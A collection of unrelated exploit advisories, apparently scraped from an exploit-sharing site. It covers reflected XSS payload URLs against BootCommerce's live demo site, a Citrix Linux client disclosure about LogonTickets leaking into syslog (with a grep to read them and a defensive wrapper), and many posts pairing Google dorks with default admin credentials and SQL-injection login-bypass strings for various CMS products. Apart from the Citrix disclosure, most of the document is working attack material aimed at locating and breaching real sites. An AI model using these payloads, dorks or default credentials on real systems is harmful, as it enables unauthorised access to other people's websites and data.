<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.mrplugins.it/bootcommerce/ │<br />│ Vendor : MrPlugins │<br />│ Software : BootCommerce 3.2.1 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message, and can then perform a wide variety of actions, such as stealing │<br />│ the victim's session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /bootcommerce/search.php<br /><br /><br />URL parameter 'sp' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tvbmhz4%22onfocus%3d%22alert(1)%22autofocus%3d%22dlit2&of=false&sp_n=t&sp_t=t&sp_d=t&sp_mk=t&sp_w=t<br /><br /><br />URL parameter 'of' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=falsekav5w%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22h0xj6&sp_n=t&sp_t=t&sp_d=t&sp_mk=t&sp_w=t<br /><br />URL parameter 'sp_n' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=tl31l3%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22h93cp&sp_t=t&sp_d=t&sp_mk=t&sp_w=t<br /><br />URL parameter 'sp_t' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=tlelcw%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22lho07&sp_d=t&sp_mk=t&sp_w=t<br /><br />URL parameter 'sp_d' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=t&sp_d=trhpfz%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22nfcub&sp_mk=t&sp_w=t<br /><br />URL parameter 'sp_mk' is vulnerable to XSS<br /><br 
/>https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=t&sp_d=t&sp_mk=tbgy05%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22abjmb&sp_w=t<br /><br />URL parameter 'sp_w' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/search.php?p=1&sp=tv&of=false&sp_n=t&sp_t=t&sp_d=t&sp_mk=&sp_w=tbgy05%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22abjmb<br /><br /><br />Path: /bootcommerce/content/products/Books/<br /><br />URL parameter 'prc' is vulnerable to XSS<br /><br />https://www.mrplugins.it/bootcommerce/content/products/Books/?p=1&prcq3h55%22%3E%3Cscript%3Ealert(1)%3C/script%3Egwsd7&of=false<br /><br />[-] Done<br /></code></pre>
<pre><code># Citrix Linux client credential leak<br /><br />The Citrix Linux client emits its session credentials when starting a Citrix<br />session. These credentials end up being recorded in the client's system log.<br /><br />Citrix do not consider this to be a security vulnerability.<br /><br /># Software affected<br /><br />- Citrix Workspace App for Linux versions 2212.<br /><br />Other versions are likely affected.<br /><br /># Context<br /><br />When connecting to a Citrix session via a web browser such as Firefox on Linux,<br />typically you access a web application known as Citrix Storefront. This<br />provides clickable icons for the applications and remote desktop sessions<br />available to you.<br /><br />When you click on one of these, your browser is instructed to open a URL of the<br />form `receiver://.....` which is handled using `/opt/Citrix/ICAClient/util/ctxwebhelper`.<br />`ctxwebhelper` parses the URL and uses the decoded information to make an HTTP<br />GET request to the remote server for an 'ica' file, which contains the<br />connection details necessary to launch the Citrix client software,<br />`/opt/Citrix/ICAClient/wfica`.<br /><br />The ICA file contains details such as the server hostname and temporary session<br />credentials needed to authenticate the session.<br /><br /># The issue<br /><br />When making the GET request to retrieve the ICA file, `ctxwebhelper` echoes the<br />full HTTP response (headers & body) to standard output, which ends up feeding<br />into journald and then into the system log files.<br /><br />This can be demonstrated by connecting to a Citrix session and running:<br /><br /> grep receiver\\.desktop.*LogonTicket= /var/log/syslog<br /><br />which will produce output such as<br /><br /> 2023-01-12T11:15:46.816466+00:00 myhostname receiver.desktop[9999]: LogonTicket=1234567890ABCDEF1234567890ABCD<br /><br /># Vendor response<br /><br />Citrix responded to my report on 2023-01-05 to say they do not consider this 
a product vulnerability:<br /><br /> Thank you for bearing with us. We have concluded the security<br /> investigation into the reported issue and determined that the contents<br /> of /var/log/syslog can only be read or written by root user, or a<br /> syslog user or an adm group but not by an unprivileged user. As a<br /> result, we do not consider this finding as a vulnerability in the<br /> product.<br /><br /> We would like to thank you for submitting the finding and helping to<br /> keep Citrix customers safe.<br /><br /> Best Regards,<br /><br /> Citrix Security Response Team<br /><br />This is short-sighted in my opinion - logs should not be considered safe places<br />to store credentials, even temporary ones.<br /><br /># Workaround<br /><br />Since Citrix do not consider this a vulnerability it seems unlikely this behaviour will change.<br /><br />You can work around this issue by replacing ctxwebhelper with a wrapper script<br />that either discards or filters its output.<br /><br />First, rename `ctxwebhelper`:<br /><br /> mv /opt/Citrix/ICAClient/util/ctxwebhelper /opt/Citrix/ICAClient/util/ctxwebhelper.real<br /><br />Next, place a script in its place, which first redirects stdout and stderr to /dev/null before executing the real `ctxwebhelper`:<br /><br /> #!/bin/bash<br /> set -eu<br /> exec &>/dev/null<br /> "$(dirname "$0")"/ctxwebhelper.real "$@"<br /><br />Don't forget to `chmod +x /opt/Citrix/ICAClient/util/ctxwebhelper` after doing this.<br /><br />This script is available from this repository - see `ctxwebhelper.wrapper`.<br /><br />Note that this will be overwritten if the Citrix client is reinstalled.<br /><br /># Timeline<br /><br />2022-12-11: Issue disclosed to Citrix via email to secure@citrix.com<br /><br />2022-12-13: Citrix acknowledges receipt of the report, assigns identifier `CASE-8324`.<br /><br />2023-01-05: Citrix responds to say they do not consider it a vulnerability.<br /><br />2023-01-07: Reply to Citrix requesting they 
reconsider their assessment.<br /><br />2023-01-14: Public disclosure.<br /><br /># Author<br /><br />Russell Howe. [Github](https://github.com/rhowe) [Twitter](https://twitter.com/rhowe212).<br /><br /><br />ctxwebhelper.wrapper:<br /><br />#!/bin/bash<br /><br /># Brexit flags<br />set -eu<br /><br /># Ensure stdout and stderr are discarded<br />exec &>/dev/null<br /><br /># Execute the real ctxwebhelper<br />"$(dirname "$0")"/ctxwebhelper.real "$@"<br /></code></pre>
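<p>An added example, not part of the original advisory or its repository: a shell check that counts `receiver.desktop` log lines carrying a `LogonTicket=` value without echoing the ticket, plus a redaction filter of the kind the workaround names as the alternative to discarding output. The function names and the sample log lines are constructed for illustration; the log line format is the one shown in the advisory above.</p>

```shell
#!/bin/sh
# Added example (not from the original repository): audit and redact leaked
# ICA logon tickets in syslog-style text. All names here are hypothetical.

# Matches the journald line format shown in the advisory:
#   "<timestamp> <host> receiver.desktop[<pid>]: LogonTicket=<value>"
# The trailing "=" keeps neighbouring keys such as LogonTicketType from matching.
LEAK_RE='receiver\.desktop\[[0-9]+\]: LogonTicket='

# Count leaked-ticket lines on stdin without printing the ticket values.
# grep -c exits 1 when the count is 0, so "|| true" keeps "set -e" callers alive.
count_ticket_leaks() {
    grep -Ec "$LEAK_RE" || true
}

# Replace every LogonTicket value on stdin with a fixed marker, leaving the
# rest of each line (timestamp, host, other ICA fields) untouched.
redact_tickets() {
    sed -E 's/(LogonTicket=)[^[:space:]]+/\1[REDACTED]/g'
}

# Constructed sample input modelled on the log line in the advisory.
sample_log() {
    cat <<'EOF'
2023-01-12T11:15:46.816466+00:00 myhostname receiver.desktop[9999]: LogonTicket=1234567890ABCDEF1234567890ABCD
2023-01-12T11:15:46.816501+00:00 myhostname receiver.desktop[9999]: LogonTicketType=CTXS1
2023-01-12T11:15:47.000000+00:00 myhostname sshd[1200]: Accepted publickey for user
EOF
}

# When given a log file path, report how many ticket lines it contains.
if [ "$#" -gt 0 ]; then
    count_ticket_leaks < "$1"
fi
```

<p>Run it with a log file path as the first argument (reading /var/log/syslog needs root or adm-group access) to print the number of leaked ticket lines. In a filtering wrapper, the output of `ctxwebhelper.real` would be piped through `redact_tickets` instead of being redirected to /dev/null.</p>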
<pre><code>====================================================================================================================================<br />| # Title : Active Matrimonial CMS v3.5 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit) | <br />| # Vendor : https://codecanyon.net/item/active-matrimonial-cms/21627663?s_rank=25 | <br />| # Dork : "Every user registered on Active Matrimonial is verified via photo and mobile phone " |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use Payload : user=admin@example.com & pass=123456 <br /><br />[+] https://127.0.0.1/matrimonial.instaaworkcom/admin/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : yazılımı jettweb Haber V3 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) |<br />| # Vendor : http://haberv3.proemlaksitesi.net/ | <br />| # Dork : "yazılımı jettweb" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] In the search box, we use the payload : <--`<img/src=` onerror=confirm`https://cxsecurity.com/author/indoushka/1/`> --!><br /><br />[+] test : https://127.0.0.1/haberv3proemlaksitesinet/ <br /><br /><br />==Greetings to :=========================================================================================================================<br />| |<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* thelastvvv *Zigoo.eg * moncet |<br />| |<br />=========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Incrementer CMS v0.1 Technology Solutions Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://microdynamicsind.com/ | <br />| # Dork : "Designed & Developed by Incrementer Technology Solutions Pvt. Ltd." |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /> <br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use Payload : user=admin@gmail.com & pass=123456 <br /><br />[+] https://127.0.0.1/silovely/505@erroradmin/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Inlislite V3.2 Backdoor Account Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://inlislite.perpusnas.go.id/?read=installerphp | <br />| # Dork : Inlislite V3.2 © 2017 - 2018 |<br />====================================================================================================================================<br /><br />poc :<br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use Payload : user=inlislite & pass=inlislite= or user=superadmin & pass=superadmin<br /><br />[+] https://inlislite.127.0.0.1/backend/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : KesionCMS X 1.5.160902 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) | <br />| # Vendor : https://www.kesion.com/ | <br />| # Dork : Powered by KesionCMS |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use Payload : user=admin & pass=admin888 <br /><br />[+] http://127.0.0.1.com/kesion/Admin/index.asp<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Infobool v 3.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://www.infobool.com/ | <br />| # Dork : "© 2017 All rights reserved. Powered By: Infobool" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use payload : user : 'or''=' & Pass : 'or''='<br /><br />[+] https://www.com/admin/<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Global Infotech cms v 1.0 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://www.globalinfotech.co | <br />| # Dork : intext:"Powered by : Global Infotech" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine <br /><br />[+] http://127.0.0.1/dhamdhacollegeacin/faculty.aspx?staff=1%27 <===== inject here<br /><br />[+] login : http://127.0.0.1/dhamdhacollegeacin/admin/<br /><br />===========================================================================================================================================================================================================================================================================<br />| # Title : Global Infotech cms v 1.0 Auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://www.globalinfotech.co | <br />| # Dork : intext:"Powered by : Global Infotech" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine <br /><br />[+] Use Payload = user & pass : 1'or'1'='1<br /><br />[+] http://127.0.0.1/aaravcscdurgcom/admin/Dashboard.aspx<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. 
Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Infokart v1.1 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://eatself.com/ | <br />| # Dork : Powered by Infokart India Pvt. Ltd. |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use payload : user : 1'or'1'='1 & Pass : 1'or'1'='1<br /><br />[+] https://wwwcom/admin/Suggestion<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>